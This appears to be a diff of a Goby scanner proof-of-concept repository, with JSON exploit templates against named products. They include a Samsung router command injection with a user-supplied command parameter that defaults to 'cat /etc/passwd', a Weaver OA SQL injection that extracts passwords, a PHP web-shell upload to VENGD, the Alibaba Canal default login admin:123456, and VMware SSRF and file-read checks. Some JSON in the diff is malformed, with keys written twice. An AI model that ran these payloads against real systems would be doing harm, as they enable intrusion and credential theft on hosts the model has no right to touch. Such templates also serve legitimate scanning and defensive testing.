"Impact": "Samsung WLAN AP wea453e router has a remote command execution vulnerability.",
"Recommendation": "",
"References": [],
"HasExp": true,
"ExpParams": [
{
"Name": "Cmd",
"Type": "input",
"Value": "cat /etc/passwd"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"method": "GET",
"uri": "/(download)/tmp/a.txt",
"follow_redirect": true,
"follow_redirect": false,
"header": {
"Connection": "close",
"Content-Length": "48"
"Content-Type": "application/json;charset=UTF-8"
},
"data_type": "text",
"data": "command1=shell:cat /etc/passwd| dd of=/tmp/a.txt"
"data": "command1=shell:cat /etc/passwd| dd of=/tmp/a.txt",
"set_variable": []
},
"ResponseTest": {
"type": "group",
@ -46,9 +58,43 @@
}
]
},
"SetVariable": []
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "2021-04-01 11:47:39",
"GobyVersion": "1.8.237"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/(download)/tmp/a.txt",
"follow_redirect": false,
"header": {
"Content-Type": "application/json;charset=UTF-8"
},
"data_type": "text",
"data": "command1=shell:{{{Cmd}}}| dd of=/tmp/a.txt",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

14
poc/Security_Devices_Hardcoded_Password.json
View File

@ -5,11 +5,11 @@
"infoleak"
],
"GobyQuery": "body=\"var dkey_verify = Get_Verify_Info(hex_md5)\"",
"Description": "中科网威、网域科技、锐捷、天工网络等防火墙web管理程序存在硬编码漏洞。",
"Product": "多个",
"Homepage": "",
"Author": "aetkrad",
"Impact": "",
"Description": "",
"Product": "",
"Homepage": "",
"Author": "",
"Impact": "There are hard-coded vulnerabilities in firewall web management programs such as Zhongke Wangwei, Wangyu Technology, Ruijie, and Tiangong Network.",
"Recommendation": "",
"References": [
"https://mp.weixin.qq.com/s/59-rkZUWZNtJVgIbpULnxw"
@ -94,6 +94,6 @@
]
}
],
"PostTime": "2021-12-06 16:14:12",
"GobyVersion": "1.9.310"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

52
poc/SonarQube_unauth_CVE_2020_27986.json
View File

@ -4,7 +4,7 @@
"Tags": [
"unauth"
],
"GobyQuery": "app=\"SonarQube-code management\"",
"GobyQuery": "app=\"SonarQube\"",
"Description": "SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI.",
"Product": "SonarQube",
"Homepage": "https://www.sonarqube.org/",
@ -14,7 +14,7 @@
"References": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27986"
],
"HasExp": true,
"HasExp": false,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -64,50 +64,6 @@
]
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/api/settings/values",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "sonaranalyzer-cs.nuget.packageVersion",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "sonar.core.id",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "2022-06-25 20:10:24",
"GobyVersion": "1.9.323"
"PostTime": "2021-11-29 15:03:58",
"GobyVersion": "1.9.310"
}

14
poc/VENGD_Arbitrary_File_Upload.json
View File

@ -5,11 +5,11 @@
"getshell"
],
"GobyQuery": "title=\"和信下一代云桌面VENGD\"",
"Description": "和信创天云桌面系统存在任意文件上传",
"Description": "VENGD",
"Product": "VENGD",
"Homepage": "https://www.vesystem.com/products/3",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "VENGD Arbitrary File Upload",
"Recommendation": "",
"References": [
"https://blog.csdn.net/weixin_44146996/article/details/115611026"
@ -37,7 +37,7 @@
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv"
},
"data_type": "text",
"data": "------WebKitFormBoundaryfcKRltGv\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\nContent-Type: image/avif\n\n<?php\nprint \"{{{str1}}}\";\n?>\n------WebKitFormBoundaryfcKRltGv--",
"data": "------WebKitFormBoundaryfcKRltGv\r\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\r\nContent-Type: image/avif\r\n\r\n<?php\r\nprint \"{{{str1}}}\";\r\n?>\r\n------WebKitFormBoundaryfcKRltGv--",
"set_variable": [
"str1|rand|str|7",
"r1|rand|int|8"
@ -106,7 +106,7 @@
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv"
},
"data_type": "text",
"data": "------WebKitFormBoundaryfcKRltGv\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\nContent-Type: image/avif\n\n{{{FileContent}}}\n------WebKitFormBoundaryfcKRltGv--",
"data": "------WebKitFormBoundaryfcKRltGv\r\nContent-Disposition: form-data; name=\"file\"; filename=\"{{{r1}}}.php\"\r\nContent-Type: image/avif\r\n\r\n{{{FileContent}}}\r\n------WebKitFormBoundaryfcKRltGv--",
"set_variable": [
"r1|rand|int|8"
]
@ -156,6 +156,6 @@
]
}
],
"PostTime": "2021-12-09 13:55:04",
"GobyVersion": "1.9.310"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

31
poc/VMWare_Operations_vRealize_Operations_Manager_API_SSRF_CVE_2021_21975.json
View File

@ -4,16 +4,23 @@
"Tags": [
"SSRF"
],
"GobyQuery": "app=\"Apache-Web-Server\" && title==\"vRealize Operations Manager\"",
"Description": "malicious attackers who access the vrealize Operations Manager API through the network can perform server-side request forgery attack to steal management credentials.",
"GobyQuery": "app=\"Apache-Web-Server\" && title=\"vRealize Operations Manager\"",
"Description": "vRealize Operations Enable self-driving IT Operations Management across private, hybrid and multi-cloud environments with a unified operations platform that delivers continuous performance, capacity and cost optimization, intelligent remediation and integrated compliance through AI/ML and predictive analytics.",
"Product": "VMWare Operations vRealize Operations",
"Homepage": "https://www.vmware.com/cn/products/vrealize-operations.html",
"Author": "PeiQi",
"Impact": "<p>&nbsp;can perform server-side request forgery attack to steal management credentials.<br></p>",
"Recommandation": "<p>undefined</p>",
"Homepage": "https://www.vmware.com/products/vrealize-operations.html",
"Author": "",
"Impact": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.",
"Recommendation": "",
"References": [
"http://wiki.peiqi.tech"
"https://nvd.nist.gov/vuln/detail/CVE-2021-21975",
"https://www.vmware.com/security/advisories/VMSA-2021-0004.html"
],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -64,7 +71,7 @@
"SetVariable": []
}
],
"ExploitSteps": [
"ExploitSteps": [
"AND",
{
"Request": {
@ -111,11 +118,9 @@
}
]
},
"SetVariable": [
"output|lastbody"
]
"SetVariable": []
}
],
"PostTime": "2021-04-07 23:45:28",
"GobyVersion": "1.8.255"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

6
poc/VMware_vCenter_v7.0.2_Arbitrary_File_Read.json
View File

@ -8,7 +8,7 @@
"Description": "VMware vCenter Server is advanced server management software that provides a centralized platform for controlling your VMware vSphere environments, allowing you to automate and deliver a virtual infrastructure across the hybrid cloud with confidence.",
"Product": "VMware-vCenter",
"Homepage": "https://www.vmware.com/products/vcenter-server.html",
"Author": "aetkrad",
"Author": "",
"Impact": "",
"Recommendation": "",
"References": [
@ -100,6 +100,6 @@
]
}
],
"PostTime": "2021-12-02 18:50:55",
"GobyVersion": "1.9.310"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

28
poc/Weaver_OA_8_SQL_injection.json
View File

@ -5,15 +5,19 @@
"SQL Injection"
],
"GobyQuery": "app=\"Weaver-OA\"",
"Description": "There is a SQL injection vulnerability in Pan micro OA V8, through which an attacker can obtain administrator and server privileges",
"Description": "",
"Product": "Weaver OA 8",
"Homepage": "https://www.weaver.com.cn/",
"Author": "PeiQi",
"Impact": "",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"Homepage": "https://weaver.com/",
"Author": "",
"Impact": "There is a SQL injection vulnerability in Pan micro OA V8, through which an attacker can obtain administrator and server privileges.",
"Recommendation": "",
"References": [],
"HasExp": false,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -21,7 +25,7 @@
"method": "GET",
"uri": "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager",
"follow_redirect": false,
"header": {},
"header": null,
"data_type": "text",
"data": ""
},
@ -47,7 +51,7 @@
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": "<html>",
"value": "&lt;html&gt;",
"bz": ""
},
{
@ -62,6 +66,6 @@
"SetVariable": []
}
],
"PostTime": "2021-04-10 08:00:20",
"GobyVersion": "1.8.255"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

54
poc/YAPI_RCE.json
View File

@ -4,17 +4,20 @@
"Tags": [
"rce"
],
"GobyQuery": "(app=\"YAPI\" | title==\"YApi-高效、易用、功能强大的可视化接口管理平台\" | title==\"YApi Pro-高效、易用、功能强大的可视化接口管理平台\")",
"Description": "YAPI是由去哪儿网移动架构组(简称YMFE一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具是一个可本地部署的、打通前后端及QA的接口管理平台。YAPI发布在公网且开发注册会导致攻击者注册后执行任意命令。",
"GobyQuery": "app=\"YAPI\" || title==\"YApi-高效、易用、功能强大的可视化接口管理平台\" || title==\"YApi Pro-高效、易用、功能强大的可视化接口管理平台\"",
"Description": "YApi is an efficient, easy-to-use and powerful visual interface management platform.",
"Product": "YAPI",
"Homepage": "https://github.com/YMFE/yapi",
"Author": "aetkrad",
"Impact": "",
"Author": "",
"Impact": "A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code.",
"Recommendation": "",
"References": [
"https://www.secpulse.com/archives/162502.html",
"https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b",
"https://twitter.com/sec715/status/1415484190561161216",
"https://mp.weixin.qq.com/s/zobag3-fIl_0vrc8BrnRjg"
],
"HasExp": false,
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -64,6 +67,43 @@
]
}
],
"PostTime": "2021-12-01 20:34:40",
"GobyVersion": "1.9.310"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

26
poc/alibaba_canal_default_password.json
View File

@ -1,18 +1,20 @@
{
"Name": "alibaba canal default password",
"Level": "3",
"Name": "Alibaba Canal Default Password",
"Level": "2",
"Tags": [
"defaultaccount"
],
"GobyQuery": "(title=\"Canal Admin\"|body=\"Canal Admin Login\")",
"Description": "alibaba canal has a default password problem. Attackers can log in through admin:123456",
"Product": "Remote attacker can use this default to control the system",
"GobyQuery": "title=\"Canal Admin\" || body=\"Canal Admin Login\"",
"Description": "Alibaba Canal is Incremental log parsing based on MySQL database, providing incremental data subscription and consumption.",
"Product": "Alibaba Canal",
"Homepage": "https://github.com/alibaba/canal",
"Author": "aetkrad",
"Impact": "",
"Recommendation": "",
"References": [],
"HasExp": false,
"Author": "",
"Impact": "Alibaba Canal has a default password vulnerability, an attacker can use the administrator account admin:123456 login.",
"Recommendation": "Modify Alibaba Canal administrator's default password.",
"References": [
"https://github.com/alibaba/canal/wiki/ClientAdapter"
],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -128,6 +130,6 @@
]
}
],
"PostTime": "2021-10-31 17:23:05",
"GobyVersion": "1.8.302"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}

28
poc/fahuo100_sql_injection_CNVD_2021_30193.json
View File

@ -1,19 +1,25 @@
{
"Name": "fahuo100_sql_injection_CNVD_2021_30193",
"Level": "3",
"Name": "Fahuo100 SQL Injection CNVD-2021-30193",
"Level": "2",
"Tags": [
"SQL Injection"
],
"GobyQuery": "header=\"Cache-Control: no-store, no-cache\"",
"Description": "发货100 M_id参数存在SQL注入漏洞 攻击者通过漏洞可以获取数据库敏感信息",
"Product": "发货100",
"Description": "Fahuo100 virtual goods automatic delivery system is a powerful virtual goods automatic delivery system/article paid reading system.",
"Product": "Fahuo100",
"Homepage": "https://www.fahuo100.cn/",
"Author": "gobysec@gmail.com",
"Impact": "",
"Recommandation": "<p>undefined</p>",
"Author": "",
"Impact": "Fahuo100 M_id SQL Injection",
"Recommendation": "",
"References": [
"https://gobies.org/"
"https://www.cnvd.org.cn/flaw/show/CNVD-2021-30193"
],
"HasExp": false,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -21,7 +27,7 @@
"method": "GET",
"uri": "/?M_id=1'&type=product",
"follow_redirect": true,
"header": {},
"header": null,
"data_type": "text",
"data": ""
},
@ -48,6 +54,6 @@
"SetVariable": []
}
],
"PostTime": "2021-06-03 22:27:28",
"GobyVersion": "1.8.268"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}